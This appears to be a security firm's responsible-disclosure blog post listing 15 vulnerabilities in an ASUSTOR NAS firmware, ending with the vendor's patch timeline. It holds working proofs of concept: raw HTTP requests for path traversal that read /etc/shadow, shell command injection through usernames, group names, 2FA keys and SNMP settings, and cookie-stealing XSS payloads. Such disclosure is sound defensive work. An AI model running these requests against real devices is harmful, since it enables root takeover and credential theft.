Over a Dozen Vulnerabilities Discovered in ASUSTOR AS-602T

ISE Labs produces 15 CVEs in NAS device

ISE Labs has disclosed 15 vulnerabilities in the ASUSTOR AS-602T network-attached storage (NAS) device, firmware version ADM 3.1.1. This is the highest number of issues we have seen in a product in our most recent round of assessments. Given the device’s wide attack surface — it offers a web-based control panel and several network-accessible system services—we were able to uncover a diverse and severe set of flaws, ranging from cross-site scripting to root command injection. This blog post will go over the basic outline of each vulnerability and provide PoC where applicable.

For an in-depth walkthrough of exploiting one of these vulnerabilities, please refer to our last blog post on this device.

Cross-Site Scripting via SVG Images (CVE-2018-12305)

The File Explorer feature of the web interface allows users to upload files to the NAS and view them in a browser. An attacker can conduct cross-site scripting attacks against users of File Explorer by uploading an SVG image, with an extension of .png, that contains embedded JavaScript, such as the one below:

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<script type="text/javascript">
alert(1);
</script>
</svg>

When a victim user views the file using the Preview in new Window functionality, the JavaScript contained in the SVG file will execute. Because the NAS sends session tokens in a URL parameter, the attacker’s JavaScript can access authentication data even though it operates in an XML Document context.

Directory Traversal via download.cgi (CVE-2018–12306)

By including path traversal characters in the file1 URL parameter in requests to /portal/apis/fileExplorer/download.cgi, an attacker with access to the web interface can download arbitrary system files. Because the web application process runs with root privileges, any file may be accessed through this vector. A proof-of-concept request to download /etc/shadow is shown below:

POST /portal/apis/fileExplorer/download.cgi?sid=e3bsWlCPAAAjp5Fb&act=download_sys_setting&file1=%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fshadow&_dc=1525445693624 HTTP/1.1
Host: 192.168.1.119:8001
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.119:8001/portal/?5AEC4C55
Content-Type: multipart/form-data; boundary=---------------------------21202898831507825044124047157
Content-Length: 62
Cookie: as_admin=1; as_sid=wmvsWviSAACcoCFU; theme=themeBlue; as_account=admin; as_stay=1; as_lang=en-US; as_passport=vw4jIWMPKryHjBQKRC0tZ0
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------21202898831507825044124047157--

Command Injection in user.cgi (CVE-2018–12307)

When adding a system user using the endpoint /portal/apis/accessControl/user.cgi, the application backend does not properly validate or sanitize the username before passing it to the shell. As a result, an attacker with the ability to create new user accounts may execute arbitrary system commands as root. A proof-of-concept request to reboot the device is shown below:

POST /portal/apis/accessControl/user.cgi?sid=UanxWq8ZTxRQwst-&act=add&_dc=1525787023036 HTTP/1.1
Host: 192.168.1.119:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.119:8000/portal/?5AF1A877
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 175
Cookie: as_admin=1; theme=themeBlue; as_lang=en-US; as_login_error=5000; as_sid=UanxWq8ZTxRQwst-
Connection: close
name=test_rramgattie `reboot`&uid=1004&password=password&email=&description=test_rramgattie&change_password=1&enable_expire=0&expire_date=&gids=100&notification=0&admin_priv=0

Shared Folder Encryption Key Sent as URL Parameter (CVE-2018–12308)

The web interface of the NAS allows users to create shared folders, and optionally encrypt them using a password. This password is included in the URL of the initial request to create the folder, as well as a subsequent request seen below:

POST /portal/apis/accessControl/share.cgi?sid=RxbrWo6UMACCV2Vg&act=export_key&name=ja&encrypt_key=password&_dc=1525370963962 HTTP/1.1
Host: 192.168.1.119:8001
User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.119:8001/portal/?5AEB0BDE
Content-Type: multipart/form-data; boundary=---------------------------72310334817476134770982115
Content-Length: 59
Cookie: as_admin=1; as_sid=RxbrWo6UMACCV2Vg; theme=themeBlue; as_account=admin; as_passport=p2bBBHlsbvtcuAYtkOsEZ/; as_stay=1; as_lang=en-US
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------72310334817476134770982115--

Directory Traversal via upload.cgi (CVE-2018–12309)

By including path traversal characters in the path URL parameter in POST requests to /portal/apis/fileExplorer/upload.cgi, an attacker can upload files to arbitrary locations on the NAS. Because the web application process runs with root privileges, there are no restrictions on the upload directory. A proof-of-concept request to place a file in /tmp is shown below:

POST /portal/apis/fileExplorer/upload.cgi?sid=Ja3sWr4X1gCfc6RK&act=upload&overwrite=1&path=%2FWeb%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp HTTP/1.1
Host: 192.168.1.119:8000
Content-Length: 203
Origin: http://192.168.1.119:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36
Content-Type: multipart/form-data; boundary= — — WebKitFormBoundaryaKme0AzODGMQbfgs
Accept: */*
Referer: http://192.168.1.119:8000/portal/?5AECAD24
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: as_admin=1; theme=themeBlue; as_lang=en-US; as_account=admin; as_passport=dIjFig7guHsBg4hQX1KQa/; as_stay=1; as_sid=Ja3sWr4X1gCfc6RK
Connection: close
------WebKitFormBoundaryaKme0AzODGMQbfgs
Content-Disposition: form-data; name=”file”; filename=”test”
Content-Type: text/plain
test
------WebKitFormBoundaryaKme0AzODGMQbfgs--

Note: manipulation of the filename POST parameter for directory traversal was identified in CVE-2018–11345.

Cross-Site Scripting on Login page (CVE-2018–12310)

The web interface allows users to a set a “system announcement” that appears on the login page of the application. By setting the announcement to a cross-site scripting payload, e.g. <img src=a onerror=alert(1)>, attackers can conduct cross-site scripting attacks to steal login credentials.

Missing Input Sanitization on File Explorer filenames (CVE-2018–12311)

When using File Explorer to move a file whose name contains an XSS payload, e.g. <img src=a onerror=alert(document.cookie)>, the malicious JavaScript will evaluate in the user’s browser. Attackers who control the names of files on the device can leverage this to conduct cross-site scripting attacks against users of the web application.

Command Injection through 2FA Settings (CVE-2018–12312)

When adding a system user using the endpoint /portal/apis/accessControl/user.cgi, the application backend does not properly validate or sanitize the secret_key URL parameter, normally used for two-factor authentication, before passing it to the shell. As a result, an attacker with the ability to create new user accounts may execute arbitrary system commands as root. A proof-of-concept request to reboot the device is shown below:

POST /portal/apis/accessControl/user.cgi?sid=Y3LsWu95GgCsb40y&act=set_two_step_auth&enable_tw_step_auth=true&secret_key=%60reboot%200%60&verifycode=123456&_dc=1525445332602 HTTP/1.1
Host: 192.168.1.119:8000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.119:8000/portal/?
X-Requested-With: XMLHttpRequest
Cookie: as_admin=0; theme=themeBlue; as_lang=en-US; as_login_error=5000; as_sid=Y3LsWu95GgCsb40y
Connection: close
Content-Length: 0

Unauthenticated Command Injection in SNMP API (CVE-2018–12313)

The SNMP API endpoint at /portal/apis/services/snmp.cgi does not perform any authorization checks or input validation before adding user-specified values to the system-wide SNMP daemon configuration file. As a result, unauthenticated attackers may execute arbitrary system commands with root privileges. A proof-of-concept request to inject a whoami command is shown below:

GET /portal/apis/services/snmp.cgi?enable_snmp=1&rocommunity=bork%0Aextend+bork+/usr/bin/whoami&enable_snmp_v1v2=1&enable_snmp_v3=1&rouser=bork&passwd=password&trap_critical=1&trap_error=1&trap_warning=1&trap_information=0&trap_address=192.168.1.1 HTTP/1.1
Host: 192.168.1.119:8000

In this example, the rocommunity parameter contains URL-encoded newline characters (“%0A”) and an extend statement containing the malicious command.

Once the request returns, trigger the command and view its output using a utility such as snmpwalk:

snmpwalk -v1 -c bork 192.168.1.119 .1.3.6.1.4.1.8072.1.3.2

For a more detailed walkthrough of exploiting this vulnerability, refer to our previous article on this device, Unauthenticated Remote Code Execution in Asustor AS-602T (CVE-2018–12313).

Directory Traversal via downloadwallpaper.cgi (CVE-2018–12314)

By manipulating the file and folder URL parameters in requests to /portal/apis/wallpaper/downloadwallpaper.cgi, an attacker may download arbitrary files from the system. Because the web application process runs with root privileges, any file may be accessed through this vector. A proof-of-concept URL to download /etc/shadow is shown below:

https://192.168.1.119:8001/portal/apis/wallpaper/downloadwallpaper.cgi?sid=e3bsWlCPAAAjp5Fb&act=download&resize=0&file=shadow&folder=/home/admin/../../../../../../../../../etc

Password Change Does Not Require Existing Password (CVE-2018–12315)

When a user requests to change their password from the web application, the user is not required to input their current password.

Command Injection in upload.cgi (CVE-2018–12316)

The File Explorer feature of the web interface allows users to upload files to the NAS. An attacker with the ability to upload files may execute arbitrary system commands as root by issuing a POST request to /portal/apis/fileExplorer/upload.cgi with a filename parameter containing command substitution syntax, e.g. $(reboot).jpg.

Filenames of JPEG images are the most effective from an attacker’s standpoint, as they are used in a convert command shortly after upload.

Command Injection in group.cgi (CVE-2018–12317)

When adding a new user group using the endpoint /portal/apis/accessControl/group.cgi, the application backend does not properly validate or sanitize the group name before passing it to the shell. As a result, an attacker with the ability to create groups may execute arbitrary system commands as root. A proof-of-concept request to reboot the device is shown below:

POST /portal/apis/accessControl/group.cgi?sid=ZJD1WgrXMQiROeZl&act=add&_dc=1526042903471 HTTP/1.1
Host: 192.168.1.119:8001
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.119:8001/portal/?5AF57FF4
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 60
Cookie: as_admin=1; as_sid=ZJD1WgrXMQiROeZl; theme=window_themeGreen; as_account=bronald2; as_stay=1; as_lang=en-US; as_passport=PZs/TIe.MQ3h1chCnYyjI/
Connection: close
name=ise%60reboot+now%60&gid=1001&description=ise&members=

snmp.cgi Returns Password in Cleartext (CVE-2018–12318)

When viewing the settings for SNMP via the Services section of the web application, the server responds with the current SNMP password in cleartext. This information can be disclosed by non-administrator users. A proof-of-concept request to reveal the password is shown below:

POST /portal/apis/services/snmp.cgi?act=get&tab=Get&_dc=1530552418588 HTTP/1.1
Host: 192.168.1.19:8000
Content-Length: 0
Origin: http://192.168.1.19:8000
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36
Accept: */*
Referer: http://192.168.1.19:8000/portal/?5B3A5D0F
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Login Denial of Service (CVE-2018–12319)

By setting the login page title to <script>alert(1)</script>, attackers with access to the web interface can cause the markup of the login page to fail to render, preventing users from signing in.

Disclosure Timeline

• May 17, 2018: Reported vulnerabilities to ASUSTOR project manager
• May 21, 2018: ASUSTOR acknowledged report and sent to R&D for verification
• May 31, 2018: ASUSTOR released firmware version ADM 3.1.3.RHU2 to fix vulnerabilities

Shaun Mirani, Junior Security Analyst @ Independent Security Evaluators

Sign up to get our latest blogs.